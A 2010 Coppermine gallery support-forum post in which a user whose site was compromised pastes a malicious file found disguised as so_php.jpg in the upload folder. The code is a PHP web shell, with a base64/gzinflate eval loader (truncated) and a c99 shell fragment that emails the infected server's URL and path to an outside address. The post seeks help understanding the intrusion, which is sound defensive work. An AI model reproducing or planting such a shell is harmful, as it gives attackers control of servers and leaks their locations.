gallery exploited - php shell? gallery exploited - php shell?
 

News:

CPG Release 1.6.27
change DB IP storage fields to accommodate IPv6 addresses
remove use of E_STRICT (PHP 8.4 deprecated)
update README to reflect new website
align code with new .com CPG website
correct deprecation in captcha

Main Menu

gallery exploited - php shell?

Started by toke, December 03, 2010, 10:05:27 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

toke

December 03, 2010, 10:05:27 AM
Hello,

today i was downloading a backup, and when i ziped it up with 7-zip my antvirus went off and i found this file was in /gallery/userpics/so_php.jpg

Code Select
<?PHP
            //Authentication
$login = ""; //Login
$pass = "";  //Pass
$md5_pass = "d0929b176456727f564dc6281ad4d722"; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCB[...........to long, had to cut it out. ill upload txt file...................]2OCB6Gds5T7dJIsm2wrS+Y/O19dCsltUVCNIAWIIgeFb//eeff/79z/8A')));

<?
// sh3ll.us & no-shell.net
// shell4spam@gmail.com
// shell4spam@gmail.com
$site = "www.Sh3ll.Us";
if(!ereg($site, $_SERVER['SERVER_NAME']))
{
   $to = "fofo-303@hotmail.com";
   $subject = "EGFM";
   $header = "from: EGFM <fofo-303@hotmail.com>";
   $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
   $message .= "Path : " . __file__;
   $sentmail = @mail($to, $subject, $message, $header);
   
   echo "";
   exit;
}
?>
</body></html><?php chdir($lastdir); c99shexit(); ?>

i am about to upgrade to 1.5 however i would like to know what this code did.
Print
Go Up Pages1
User actions